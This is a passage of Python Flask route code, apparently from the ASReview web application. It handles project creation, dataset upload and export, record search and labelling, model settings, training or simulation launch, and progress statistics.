list(current_user.involved_in)\n project_paths = [project.project_path for project in user_db_projects]\n else:\n # force get_projects to list the .asreview folder\n project_paths = None\n\n for project in get_projects(project_paths):\n project_config = project.config\n\n # upgrade info of v0 projects\n if project_config[\"version\"].startswith(\"0\"):\n project_config = upgrade_project_config(project_config)\n project_config[\"projectNeedsUpgrade\"] = True\n\n # get dashboard statistics\n try:\n if project_config[\"reviews\"][0][\"status\"] == \"review\":\n stats_counter[\"n_in_review\"] += 1\n elif project_config[\"reviews\"][0][\"status\"] == \"finished\":\n stats_counter[\"n_finished\"] += 1\n else:\n stats_counter[\"n_setup\"] += 1\n except Exception:\n stats_counter[\"n_setup\"] += 1\n\n response = jsonify({\"result\": stats_counter})\n\n return response\n\n\[email protected](\"/projects/info\", methods=[\"POST\"])\n@asreview_login_required\ndef api_init_project(): # noqa: F401\n \"\"\"Initialize a new project\"\"\"\n\n project_mode = request.form[\"mode\"]\n project_title = request.form[\"name\"]\n project_description = request.form[\"description\"]\n project_authors = request.form[\"authors\"]\n\n # get a unique project id\n project_id = uuid4().hex\n\n # get path of this project\n project_path = get_project_path(project_id)\n\n project = ASReviewProject.create(\n project_path,\n project_id=project_id,\n project_mode=project_mode,\n project_name=project_title,\n project_description=project_description,\n project_authors=project_authors,\n )\n\n # create a database entry for this project\n if app_is_authenticated(current_app):\n current_user.projects.append(Project(project_id=project_id))\n DB.session.commit()\n\n response = jsonify(project.config)\n\n return response, 201\n\n\[email protected](\"/projects/<project_id>/upgrade_if_old\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_upgrade_project_if_old(project):\n \"\"\"Get upgrade project if it is v0.x\"\"\"\n\n if not project.config[\"version\"].startswith(\"0\"):\n response = jsonify(message=\"Can only convert v0.x projects.\")\n return response, 400\n\n # errors are handled by the InternalServerError\n upgrade_asreview_project_file(project.project_path)\n\n response = jsonify({\"success\": True})\n return response\n\n\[email protected](\"/projects/<project_id>/info\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_project_info(project): # noqa: F401\n \"\"\"\"\"\"\n project_config = project.config\n\n # upgrade info of v0 projects\n if project_config[\"version\"].startswith(\"0\"):\n project_config = upgrade_project_config(project_config)\n project_config[\"projectNeedsUpgrade\"] = True\n\n # add user_id of owner to response if authenticated\n if app_is_authenticated(current_app):\n db_project = Project.query.filter(\n Project.project_id == project.config.get(\"id\", 0)\n ).one_or_none()\n if db_project:\n project_config[\"ownerId\"] = db_project.owner_id\n\n return jsonify(project_config)\n\n\[email protected](\"/projects/<project_id>/info\", methods=[\"PUT\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_update_project_info(project): # noqa: F401\n \"\"\"Update project info\"\"\"\n\n project.update_config(\n mode=request.form[\"mode\"],\n name=request.form[\"name\"],\n description=request.form[\"description\"],\n authors=request.form[\"authors\"],\n )\n\n return api_get_project_info(project.project_id)\n\n\[email protected](\"/datasets\", methods=[\"GET\"])\n@asreview_login_required\ndef api_demo_data_project(): # noqa: F401\n \"\"\"\"\"\"\n\n subset = request.args.get(\"subset\", None)\n\n manager = DatasetManager()\n\n if subset == \"plugin\":\n try:\n result_datasets = manager.list(\n exclude=[\"builtin\", \"benchmark\", \"benchmark-nature\"]\n )\n\n except Exception as err:\n logging.error(err)\n return jsonify(message=\"Failed to load plugin datasets.\"), 500\n\n elif subset == \"benchmark\":\n try:\n # collect the datasets metadata\n result_datasets = manager.list(include=[\"synergy\", \"benchmark-nature\"])\n\n except Exception as err:\n logging.error(err)\n return jsonify(message=\"Failed to load benchmark datasets.\"), 500\n\n else:\n response = jsonify(message=\"demo-data-loading-failed\")\n\n return response, 400\n\n payload = {\"result\": result_datasets}\n response = jsonify(payload)\n return response\n\n\[email protected](\"/projects/<project_id>/data\", methods=[\"POST\", \"PUT\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_upload_data_to_project(project): # noqa: F401\n \"\"\"\"\"\"\n\n # get the project config to modify behavior of dataset\n project_config = project.config\n\n # remove old dataset if present\n if \"dataset_path\" in project_config and project_config[\"dataset_path\"] is not None:\n logging.warning(\"Removing old dataset and adding new dataset.\")\n project.remove_dataset()\n\n # create dataset folder if not present\n Path(project.project_path, \"data\").mkdir(exist_ok=True)\n\n if request.form.get(\"plugin\", None):\n ds = DatasetManager().find(request.form[\"plugin\"])\n filename = ds.filename\n ds.to_file(Path(project.project_path, \"data\", filename))\n\n elif request.form.get(\"benchmark\", None):\n ds = DatasetManager().find(request.form[\"benchmark\"])\n filename = ds.filename\n ds.to_file(Path(project.project_path, \"data\", filename))\n\n elif request.form.get(\"url\", None):\n url = request.form.get(\"url\")\n\n # check if url value is actually DOI without netloc\n if url.startswith(\"10.\"):\n url = f\"https://doi.org/{url}\"\n\n filename = _get_filename_from_url(url)\n\n if bool(request.form.get(\"validate\", None)):\n reader_keys = list_reader_names()\n\n if (\n filename\n and Path(filename).suffix\n and Path(filename).suffix in reader_keys\n ):\n return jsonify(files=[{\"link\": url, \"name\": filename}]), 201\n elif filename and not Path(filename).suffix:\n raise BadFileFormatError(\"Can't determine file format.\")\n else:\n try:\n # get file list from datahugger\n dh = datahugger.info(url)\n files = dh.files.copy()\n\n for i, f in enumerate(files):\n files[i][\"disabled\"] = (\n Path(files[i][\"name\"]).suffix not in reader_keys\n )\n\n return jsonify(files=files), 201\n except Exception:\n raise BadFileFormatError(\"Can't retrieve files.\")\n\n try:\n urlretrieve(url, Path(project.project_path, \"data\") / filename)\n except Exception as err:\n logging.error(err)\n message = f\"Can't retrieve data from URL {url}.\"\n\n return jsonify(message=message), 400\n\n elif \"file\" in request.files:\n data_file = request.files[\"file\"]\n\n # check the file is file is in a correct format\n # check_dataset(data_file)\n try:\n filename = secure_filename(data_file.filename)\n fp_data = Path(project.project_path, \"data\") / filename\n\n # save the file\n data_file.save(str(fp_data))\n\n except Exception as err:\n logging.error(err)\n\n response = jsonify(message=f\"Failed to import file '{filename}'. {err}\")\n\n return response, 400\n else:\n response = jsonify(message=\"No file or dataset found to import.\")\n return response, 400\n\n if project_config[\"mode\"] == PROJECT_MODE_EXPLORE:\n data_path_raw = Path(project.project_path, \"data\") / filename\n data_path = data_path_raw.with_suffix(\".csv\")\n\n data = ASReviewData.from_file(data_path_raw)\n\n if data.labels is None:\n raise ValueError(\"Import fully labeled dataset.\")\n\n data.df.rename(\n {data.column_spec[\"included\"]: \"debug_label\"}, axis=1, inplace=True\n )\n data.to_file(data_path)\n\n elif project_config[\"mode\"] == PROJECT_MODE_SIMULATE:\n data_path_raw = Path(project.project_path, \"data\") / filename\n data_path = data_path_raw.with_suffix(\".csv\")\n\n data = ASReviewData.from_file(data_path_raw)\n\n if data.labels is None:\n raise ValueError(\"Import fully labeled dataset.\")\n\n data.df[\"debug_label\"] = data.df[data.column_spec[\"included\"]]\n data.to_file(data_path)\n\n else:\n data_path = Path(project.project_path, \"data\") / filename\n\n try:\n # add the file to the project\n project.add_dataset(data_path.name)\n\n # Bad format. TODO{Jonathan} Return informative message with link.\n except BadFileFormatError as err:\n message = f\"Failed to import file '{filename}'. {err}\"\n return jsonify(message=message), 400\n\n response = jsonify({\"project_id\": project.project_id})\n\n return response\n\n\[email protected](\"/projects/<project_id>/data\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_project_data(project): # noqa: F401\n \"\"\"\"\"\"\n\n try:\n # get statistics of the dataset\n as_data = read_data(project)\n\n statistics = {\n \"n_rows\": as_data.df.shape[0],\n \"n_cols\": as_data.df.shape[1],\n \"n_duplicates\": n_duplicates(as_data),\n \"filename\": Path(project.config[\"dataset_path\"]).stem,\n }\n\n except FileNotFoundError as err:\n logging.info(err)\n statistics = {\"filename\": None}\n\n return jsonify(statistics)\n\n\[email protected](\"/projects/<project_id>/dataset_writer\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_list_dataset_writers(project):\n \"\"\"List the name and label of available dataset writer\"\"\"\n\n fp_data = Path(project.config[\"dataset_path\"])\n\n readers = list_readers()\n writers = list_writers()\n\n # get write format for the data file\n write_format = None\n for c in readers:\n if fp_data.suffix in c.read_format:\n if write_format is None:\n write_format = c.write_format\n\n # get available writers\n payload = {\"result\": []}\n for c in writers:\n payload[\"result\"].append(\n {\n \"enabled\": True if c.write_format in write_format else False,\n \"name\": c.name,\n \"label\": c.label,\n \"caution\": c.caution if hasattr(c, \"caution\") else None,\n }\n )\n\n if not payload[\"result\"]:\n return (\n jsonify(message=f\"No dataset writer available for {fp_data.suffix} file.\"),\n 500,\n )\n\n # remove duplicate writers\n payload[\"result\"] = [\n i\n for n, i in enumerate(payload[\"result\"])\n if i not in payload[\"result\"][(n + 1) :]\n ]\n\n return jsonify(payload)\n\n\[email protected](\"/projects/<project_id>/search\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_search_data(project): # noqa: F401\n \"\"\"Search for papers\"\"\"\n q = request.args.get(\"q\", default=None, type=str)\n max_results = request.args.get(\"n_max\", default=10, type=int)\n\n project_mode = project.config[\"mode\"]\n\n payload = {\"result\": []}\n if q:\n # read the dataset\n as_data = read_data(project)\n\n # read record_ids of labels from state\n with open_state(project.project_path) as s:\n labeled_record_ids = s.get_dataset([\"record_id\"])[\"record_id\"].to_list()\n\n try:\n # search for the keywords\n result_idx = fuzzy_find(\n as_data,\n q,\n max_return=max_results,\n exclude=labeled_record_ids,\n by_index=True,\n )\n except SearchError as err:\n raise ValueError(err) from err\n\n for record in as_data.record(result_idx):\n debug_label = record.extra_fields.get(\"debug_label\", None)\n debug_label = int(debug_label) if pd.notnull(debug_label) else None\n\n if project_mode == PROJECT_MODE_SIMULATE:\n # ignore existing labels\n included = -1\n else:\n included = int(record.included)\n\n payload[\"result\"].append(\n {\n \"id\": int(record.record_id),\n \"title\": record.title,\n \"abstract\": record.abstract,\n \"authors\": record.authors,\n \"keywords\": record.keywords,\n \"included\": included,\n \"_debug_label\": debug_label,\n }\n )\n\n return jsonify(payload)\n\n\[email protected](\"/projects/<project_id>/labeled\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_labeled(project): # noqa: F401\n \"\"\"Get all papers classified as labeled documents\"\"\"\n\n page = request.args.get(\"page\", default=None, type=int)\n per_page = request.args.get(\"per_page\", default=20, type=int)\n subset = request.args.getlist(\"subset\")\n latest_first = request.args.get(\"latest_first\", default=1, type=int)\n\n with open_state(project.project_path) as s:\n data = s.get_dataset([\"record_id\", \"label\", \"query_strategy\", \"notes\"])\n data[\"prior\"] = (data[\"query_strategy\"] == \"prior\").astype(int)\n\n if any(s in subset for s in [\"relevant\", \"included\"]):\n data = data[data[\"label\"] == 1]\n elif any(s in subset for s in [\"irrelevant\", \"excluded\"]):\n data = data[data[\"label\"] == 0]\n else:\n data = data[~data[\"label\"].isnull()]\n\n if \"note\" in subset:\n data = data[~data[\"notes\"].isnull()]\n\n if \"prior\" in subset:\n data = data[data[\"prior\"] == 1]\n\n if latest_first == 1:\n data = data.iloc[::-1]\n\n # count labeled records and max pages\n count = len(data)\n if count == 0:\n payload = {\n \"count\": 0,\n \"next_page\": None,\n \"previous_page\": None,\n \"result\": [],\n }\n response = jsonify(payload)\n\n return response\n\n max_page_calc = divmod(count, per_page)\n if max_page_calc[1] == 0:\n max_page = max_page_calc[0]\n else:\n max_page = max_page_calc[0] + 1\n\n if page is not None:\n # slice out records on specific page\n if page <= max_page:\n idx_start = page * per_page - per_page\n idx_end = page * per_page\n data = data.iloc[idx_start:idx_end, :].copy()\n else:\n return abort(404)\n\n # set next & previous page\n if page < max_page:\n next_page = page + 1\n if page > 1:\n previous_page = page - 1\n else:\n previous_page = None\n else:\n next_page = None\n previous_page = page - 1\n else:\n next_page = None\n previous_page = None\n\n records = read_data(project).record(data[\"record_id\"])\n\n payload = {\n \"count\": count,\n \"next_page\": next_page,\n \"previous_page\": previous_page,\n \"result\": [],\n }\n for i, record in zip(data.index.tolist(), records):\n payload[\"result\"].append(\n {\n \"id\": int(record.record_id),\n \"title\": record.title,\n \"abstract\": record.abstract,\n \"authors\": record.authors,\n \"keywords\": record.keywords,\n \"doi\": record.doi,\n \"url\": record.url,\n \"included\": int(data.loc[i, \"label\"]),\n \"note\": data.loc[i, \"notes\"],\n \"prior\": int(data.loc[i, \"prior\"]),\n }\n )\n\n return jsonify(payload)\n\n\[email protected](\"/projects/<project_id>/labeled_stats\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_labeled_stats(project): # noqa: F401\n \"\"\"Get all papers classified as prior documents\"\"\"\n\n try:\n with open_state(project.project_path) as s:\n data = s.get_dataset([\"label\", \"query_strategy\"])\n data_prior = data[data[\"query_strategy\"] == \"prior\"]\n\n return jsonify(\n {\n \"n\": len(data),\n \"n_inclusions\": sum(data[\"label\"] == 1),\n \"n_exclusions\": sum(data[\"label\"] == 0),\n \"n_prior\": len(data_prior),\n \"n_prior_inclusions\": sum(data_prior[\"label\"] == 1),\n \"n_prior_exclusions\": sum(data_prior[\"label\"] == 0),\n }\n )\n except StateNotFoundError:\n return jsonify(\n {\n \"n\": 0,\n \"n_inclusions\": 0,\n \"n_exclusions\": 0,\n \"n_prior\": 0,\n \"n_prior_inclusions\": 0,\n \"n_prior_exclusions\": 0,\n }\n )\n\n\[email protected](\"/projects/<project_id>/prior_random\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_random_prior_papers(project): # noqa: F401\n \"\"\"Get a selection of random records.\n\n This set of records is extracted from the pool, but without\n the already labeled items.\n \"\"\"\n\n # get the number of records to return\n n = request.args.get(\"n\", default=5, type=int)\n # get the subset of records to return (for exploration and simulation mode)\n subset = request.args.get(\"subset\", default=None, type=str)\n\n with open_state(project.project_path) as state:\n pool = state.get_pool().values\n\n as_data = read_data(project)\n\n payload = {\"result\": []}\n\n if subset in [\"relevant\", \"included\"]:\n rel_indices = as_data.df[as_data.df[\"debug_label\"] == 1].index.values\n rel_indices_pool = np.intersect1d(pool, rel_indices)\n\n if len(rel_indices_pool) == 0:\n return jsonify(payload)\n elif n > len(rel_indices_pool):\n rand_pool_relevant = np.random.choice(\n rel_indices_pool, len(rel_indices_pool), replace=False\n )\n else:\n rand_pool = np.random.choice(pool, n, replace=False)\n rand_pool_relevant = np.random.choice(rel_indices_pool, n, replace=False)\n\n try:\n relevant_records = as_data.record(rand_pool_relevant)\n except Exception as err:\n logging.error(err)\n return jsonify(message=f\"Failed to load random records. {err}\"), 500\n\n for rr in relevant_records:\n payload[\"result\"].append(\n {\n \"id\": int(rr.record_id),\n \"title\": rr.title,\n \"abstract\": rr.abstract,\n \"authors\": rr.authors,\n \"keywords\": rr.keywords,\n \"included\": None,\n \"_debug_label\": 1,\n }\n )\n\n elif subset in [\"irrelevant\", \"excluded\"]:\n irrel_indices = as_data.df[as_data.df[\"debug_label\"] == 0].index.values\n irrel_indices_pool = np.intersect1d(pool, irrel_indices)\n\n if len(irrel_indices_pool) == 0:\n return jsonify(payload)\n elif n > len(irrel_indices_pool):\n rand_pool_irrelevant = np.random.choice(\n irrel_indices_pool, len(irrel_indices_pool), replace=False\n )\n else:\n rand_pool_irrelevant = np.random.choice(\n irrel_indices_pool, n, replace=False\n )\n\n try:\n irrelevant_records = as_data.record(rand_pool_irrelevant)\n except Exception as err:\n logging.error(err)\n return jsonify(message=f\"Failed to load random records. {err}\"), 500\n\n for ir in irrelevant_records:\n payload[\"result\"].append(\n {\n \"id\": int(ir.record_id),\n \"title\": ir.title,\n \"abstract\": ir.abstract,\n \"authors\": ir.authors,\n \"keywords\": ir.keywords,\n \"included\": None,\n \"_debug_label\": 0,\n }\n )\n\n else:\n if len(pool) == 0:\n return jsonify(payload)\n elif n > len(pool):\n rand_pool = np.random.choice(pool, len(pool), replace=False)\n else:\n rand_pool = np.random.choice(pool, n, replace=False)\n\n try:\n records = as_data.record(rand_pool)\n except Exception as err:\n logging.error(err)\n return jsonify(message=f\"Failed to load random records. {err}\"), 500\n\n for r in records:\n payload[\"result\"].append(\n {\n \"id\": int(r.record_id),\n \"title\": r.title,\n \"abstract\": r.abstract,\n \"authors\": r.authors,\n \"keywords\": r.keywords,\n \"included\": None,\n \"_debug_label\": None,\n }\n )\n\n return jsonify(payload)\n\n\[email protected](\"/algorithms\", methods=[\"GET\"])\n@asreview_login_required\ndef api_list_algorithms():\n \"\"\"List the names and labels of available algorithms\"\"\"\n\n classes = [\n list_balance_strategies(),\n list_classifiers(),\n list_feature_extraction(),\n list_query_strategies(),\n ]\n\n payload = {\n \"balance_strategy\": [],\n \"classifier\": [],\n \"feature_extraction\": [],\n \"query_strategy\": [],\n }\n\n for c, key in zip(classes, payload.keys()):\n for method in c:\n if hasattr(method, \"label\"):\n payload[key].append({\"name\": method.name, \"label\": method.label})\n else:\n payload[key].append({\"name\": method.name, \"label\": method.name})\n\n return jsonify(payload)\n\n\[email protected](\"/projects/<project_id>/algorithms\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_algorithms(project): # noqa: F401\n default_payload = {\n \"model\": DEFAULT_MODEL,\n \"feature_extraction\": DEFAULT_FEATURE_EXTRACTION,\n \"query_strategy\": DEFAULT_QUERY_STRATEGY,\n \"balance_strategy\": DEFAULT_BALANCE_STRATEGY,\n }\n\n # check if there were algorithms stored in the state file\n try:\n with open_state(project.project_path) as state:\n if state.settings is not None:\n payload = {\n \"model\": state.settings.model,\n \"feature_extraction\": state.settings.feature_extraction,\n \"query_strategy\": state.settings.query_strategy,\n \"balance_strategy\": state.settings.balance_strategy,\n }\n else:\n payload = default_payload\n except StateNotFoundError:\n payload = default_payload\n\n return jsonify(payload)\n\n\[email protected](\"/projects/<project_id>/algorithms\", methods=[\"POST\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_set_algorithms(project): # noqa: F401\n # TODO@{Jonathan} validate model choice on server side\n ml_model = request.form.get(\"model\", None)\n ml_query_strategy = request.form.get(\"query_strategy\", None)\n ml_balance_strategy = request.form.get(\"balance_strategy\", None)\n ml_feature_extraction = request.form.get(\"feature_extraction\", None)\n\n # create a new settings object from arguments\n # only used if state file is not present\n asreview_settings = ASReviewSettings(\n model=ml_model,\n query_strategy=ml_query_strategy,\n balance_strategy=ml_balance_strategy,\n feature_extraction=ml_feature_extraction,\n model_param=get_classifier(ml_model).param,\n query_param=get_query_model(ml_query_strategy).param,\n balance_param=get_balance_model(ml_balance_strategy).param,\n feature_param=get_feature_model(ml_feature_extraction).param,\n )\n\n # save the new settings to the state file\n with open_state(project.project_path, read_only=False) as state:\n state.settings = asreview_settings\n\n response = jsonify({\"success\": True})\n\n return response\n\n\[email protected](\"/projects/<project_id>/start\", methods=[\"POST\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_start(project): # noqa: F401\n \"\"\"Start training of first model or simulation.\"\"\"\n\n # the project is a simulation project\n if project.config[\"mode\"] == PROJECT_MODE_SIMULATE:\n # get priors\n with open_state(project.project_path) as s:\n priors = s.get_priors()[\"record_id\"].tolist()\n\n logging.info(\"Start simulation\")\n\n try:\n datafile = project.config[\"dataset_path\"]\n logging.info(\"Project data file found: {}\".format(datafile))\n\n # start simulation\n py_exe = _get_executable()\n run_command = (\n [\n # get executable\n py_exe,\n # get module\n \"-m\",\n \"asreview\",\n # run simulation via cli\n \"simulate\",\n # specify dataset\n \"\",\n # specify prior indices\n \"--prior_idx\",\n ]\n + list(map(str, priors))\n + [\n # specify state file\n \"--state_file\",\n str(project.project_path),\n # specify write interval\n \"--write_interval\",\n \"100\",\n ]\n )\n subprocess.Popen(run_command)\n\n except Exception as err:\n logging.error(err)\n message = f\"Failed to get data file. {err}\"\n return jsonify(message=message), 400\n\n # the project is an oracle or explore project\n else:\n logging.info(\"Train first iteration of model\")\n try:\n # start training the model\n py_exe = _get_executable()\n run_command = [\n # get executable\n py_exe,\n # get module\n \"-m\",\n \"asreview\",\n # train the model via cli\n \"web_run_model\",\n # specify project id\n str(project.project_path),\n # output the error of the first model\n \"--output_error\",\n # mark the first run for status update\n \"--first_run\",\n ]\n subprocess.Popen(run_command)\n\n except Exception as err:\n logging.error(err)\n return jsonify(message=\"Failed to train the model.\"), 500\n\n response = jsonify({\"success\": True})\n\n return response\n\n\[email protected](\"/projects/<project_id>/status\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_status(project): # noqa: F401\n \"\"\"Check the status of the review\"\"\"\n\n try:\n status = project.reviews[0][\"status\"]\n except Exception:\n status = None\n\n if status == \"error\":\n error_path = project.project_path / \"error.json\"\n if error_path.exists():\n logging.error(\"Error on training\")\n with open(error_path, \"r\") as f:\n error_message = json.load(f)[\"message\"]\n\n raise Exception(error_message)\n\n response = jsonify({\"status\": status})\n\n return response\n\n\[email protected](\"/projects/<project_id>/status\", methods=[\"PUT\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_status_update(project):\n \"\"\"Update the status of the review.\n\n The following status updates are allowed for\n oracle and explore:\n - `review` to `finished`\n - `finished` to `review` if not pool empty\n - `error` to `setup`\n\n The following status updates are allowed for simulate\n - `error` to `setup`\n\n Status updates by the user are not allowed in simulation\n mode.\n\n \"\"\"\n\n status = request.form.get(\"status\", type=str)\n\n current_status = project.config[\"reviews\"][0][\"status\"]\n mode = project.config[\"mode\"]\n\n if current_status == \"error\" and status == \"setup\":\n project.remove_error(status=status)\n\n response = jsonify({\"success\": True})\n\n return response\n\n if mode == PROJECT_MODE_SIMULATE:\n raise ValueError(\"Not possible to update status of simulation project.\")\n else:\n if current_status == \"review\" and status == \"finished\":\n project.update_review(status=status)\n elif current_status == \"finished\" and status == \"review\":\n project.update_review(status=status)\n # ideally, also check here for empty pool\n else:\n raise ValueError(\n f\"Not possible to update status from {current_status} to {status}\"\n )\n\n response = jsonify({\"success\": True})\n\n return response\n\n\[email protected](\"/projects/import_project\", methods=[\"POST\"])\n@asreview_login_required\ndef api_import_project():\n \"\"\"Import project\"\"\"\n\n # raise error if file not given\n if \"file\" not in request.files:\n response = jsonify(message=\"No ASReview file found to import.\")\n return response, 400\n\n try:\n project = ASReviewProject.load(\n request.files[\"file\"],\n asreview_path(),\n safe_import=True\n )\n\n # create a database entry for this project\n if app_is_authenticated(current_app):\n current_user.projects.append(\n Project(project_id=project.config.get(\"id\"))\n )\n project.config[\"owner_id\"] = current_user.id\n DB.session.commit()\n\n except Exception as err:\n logging.error(err)\n raise ValueError(\"Failed to import project.\")\n\n return jsonify(project.config)\n\n\[email protected](\"/projects/<project_id>/export_dataset\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_export_dataset(project):\n \"\"\"Export dataset with relevant/irrelevant labels\"\"\"\n\n # get the export args\n file_format = request.args.get(\"file_format\", None)\n dataset_label = request.args.get(\"dataset_label\", default=\"all\")\n\n # create temporary folder to store exported dataset\n tmp_path = tempfile.TemporaryDirectory()\n tmp_path_dataset = Path(tmp_path.name, f\"export_dataset.{file_format}\")\n\n try:\n # get labels and ranking from state file\n with open_state(project.project_path) as s:\n pool, labeled, pending = s.get_pool_labeled_pending()\n # get state dataset for accessing notes\n state_df = s.get_dataset().set_index(\"record_id\")\n\n included = labeled[labeled[\"label\"] == 1]\n excluded = labeled[labeled[\"label\"] != 1]\n\n if dataset_label == \"relevant\":\n export_order = included[\"record_id\"].to_list()\n labeled = included\n else:\n export_order = (\n included[\"record_id\"].to_list()\n + pending.to_list()\n + pool.to_list()\n + excluded[\"record_id\"].to_list()\n )\n\n # get writer corresponding to specified file format\n writers = list_writers()\n writer = None\n for c in writers:\n if writer is None:\n if c.name == file_format:\n writer = c\n\n # read the dataset into a ASReview data object\n as_data = read_data(project)\n\n # Adding Notes from State file to the exported dataset\n # Check if exported_notes column already exists due to multiple screenings\n screening = 0\n for col in as_data.df:\n if col == \"exported_notes\":\n screening = 0\n elif col.startswith(\"exported_notes\"):\n try:\n screening = int(col.split(\"_\")[2])\n except IndexError:\n screening = 0\n screening += 1\n\n state_df.rename(\n columns={\n \"notes\": f\"exported_notes_{screening}\",\n },\n inplace=True,\n )\n\n as_data.df = as_data.df.join(\n state_df[f\"exported_notes_{screening}\"], on=\"record_id\"\n )\n\n as_data.to_file(\n fp=tmp_path_dataset,\n labels=labeled.values.tolist(),\n ranking=export_order,\n writer=writer,\n )\n\n return send_file(\n tmp_path_dataset,\n as_attachment=True,\n max_age=0,\n )\n\n except Exception as err:\n raise Exception(f\"Failed to export the {file_format} dataset. {err}\")\n\n\[email protected](\"/projects/<project_id>/export_project\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef export_project(project):\n \"\"\"Export the project file.\n\n The ASReview project file is a file with .asreview extension.\n The ASReview project file is a zipped file and contains\n all information to continue working on the project as well\n as the original dataset.\n \"\"\"\n\n # create a temp folder to zip\n tmpdir = tempfile.TemporaryDirectory()\n tmpfile = Path(tmpdir.name, project.project_id).with_suffix(\".asreview\")\n\n logging.info(\"Saving project (temporary) to %s\", tmpfile)\n project.export(tmpfile)\n\n return send_file(\n tmpfile,\n as_attachment=True,\n max_age=0,\n )\n\n\ndef _get_stats(project, include_priors=False):\n if is_v0_project(project.project_path):\n json_fp = Path(project.project_path, \"result.json\")\n\n # Check if the v0 project is in review.\n if json_fp.exists():\n with open(json_fp, \"r\") as f:\n s = json.load(f)\n\n # Get the labels.\n labels = np.array(\n [\n int(sample_data[1])\n for query in range(len(s[\"results\"]))\n for sample_data in s[\"results\"][query][\"labelled\"]\n ]\n )\n\n # Get the record table.\n data_hash = list(s[\"data_properties\"].keys())[0]\n record_table = s[\"data_properties\"][data_hash][\"record_table\"]\n\n n_records = len(record_table)\n\n # No result found.\n else:\n labels = np.array([])\n n_records = 0\n else:\n # Check if there is a review started in the project.\n try:\n # get label history\n with open_state(project.project_path) as s:\n if (\n project.config[\"reviews\"][0][\"status\"] == \"finished\"\n and project.config[\"mode\"] == PROJECT_MODE_SIMULATE\n ):\n labels = _get_labels(s, priors=include_priors)\n else:\n labels = s.get_labels(priors=include_priors)\n\n n_records = len(s.get_record_table())\n\n # No state file found or not init.\n except (StateNotFoundError, StateError):\n labels = np.array([])\n n_records = 0\n\n n_included = int(sum(labels == 1))\n n_excluded = int(sum(labels == 0))\n\n if n_included > 0:\n n_since_last_relevant = int(labels.tolist()[::-1].index(1))\n else:\n n_since_last_relevant = 0\n\n return {\n \"n_included\": n_included,\n \"n_excluded\": n_excluded,\n \"n_since_last_inclusion\": n_since_last_relevant,\n \"n_papers\": n_records,\n \"n_pool\": n_records - n_excluded - n_included,\n }\n\n\ndef _get_labels(state_obj, priors=False):\n # get the number of records\n n_records = state_obj.n_records\n\n # get the labels\n labels = state_obj.get_labels(priors=priors).to_list()\n\n # if less labels than records, fill with 0\n if len(labels) < n_records:\n labels += [0] * (n_records - len(labels))\n labels = pd.Series(labels)\n\n return labels\n\n\[email protected](\"/projects/<project_id>/progress\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_progress_info(project): # noqa: F401\n \"\"\"Get progress statistics of a project\"\"\"\n\n include_priors = request.args.get(\"priors\", True, type=bool)\n\n response = jsonify(_get_stats(project, include_priors=include_priors))\n\n # return a success response to the client.\n return response\n\n\[email protected](\"/projects/<project_id>/progress_density\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_progress_density(project):\n \"\"\"Get progress density of a project\"\"\"\n\n include_priors = request.args.get(\"priors\", False, type=bool)\n\n # get label history\n with open_state(project.project_path) as s:\n if (\n project.config[\"reviews\"][0][\"status\"] == \"finished\"\n and project.config[\"mode\"] == PROJECT_MODE_SIMULATE\n ):\n data = _get_labels(s, priors=include_priors)\n else:\n data = s.get_labels(priors=include_priors)\n\n # create a dataset with the rolling mean of every 10 papers\n df = (\n data.to_frame(name=\"Relevant\")\n .reset_index(drop=True)\n .rolling(10, min_periods=1)\n .mean()\n )\n df[\"Total\"] = df.index + 1\n\n # transform mean(percentage) to number\n for i in range(0, len(df)):\n if df.loc[i, \"Total\"] < 10:\n df.loc[i, \"Irrelevant\"] = (1 - df.loc[i, \"Relevant\"]) * df.loc[i, \"Total\"]\n df.loc[i, \"Relevant\"] = df.loc[i, \"Total\"] - df.loc[i, \"Irrelevant\"]\n else:\n df.loc[i, \"Irrelevant\"] = (1 - df.loc[i, \"Relevant\"]) * 10\n df.loc[i, \"Relevant\"] = 10 - df.loc[i, \"Irrelevant\"]\n\n df = df.round(1).to_dict(orient=\"records\")\n for d in df:\n d[\"x\"] = d.pop(\"Total\")\n\n df_relevant = [{k: v for k, v in d.items() if k != \"Irrelevant\"} for d in df]\n for d in df_relevant:\n d[\"y\"] = d.pop(\"Relevant\")\n\n df_irrelevant = [{k: v for k, v in d.items() if k != \"Relevant\"} for d in df]\n for d in df_irrelevant:\n d[\"y\"] = d.pop(\"Irrelevant\")\n\n payload = {\"relevant\": df_relevant, \"irrelevant\": df_irrelevant}\n\n return jsonify(payload)\n\n\[email protected](\"/projects/<project_id>/progress_recall\", methods=[\"GET\"])\n@asreview_login_required\n@project_authorization\n@project_from_id\ndef api_get_progress_recall(project):\n \"\"\"Get cumulative number of inclusions by ASReview/at random\"\"\"\n\n include_priors = request.args.get(\"priors\", False, type=bool)\n\n with open_state(project.project_path) as s:\n if (\n project.config[\"reviews\"][0][\"status\"] == \"finished\"\n and project.config[\"mode\"] == PROJECT_MODE_SIMULATE\n ):\n data = _get_labels(s, priors=include_priors)\n else:\n data = s.get_labels(priors=include_priors)\n\n n_records = len(s.get_record_table())\n\n # create a dataset with the cumulative number of inclusions\n 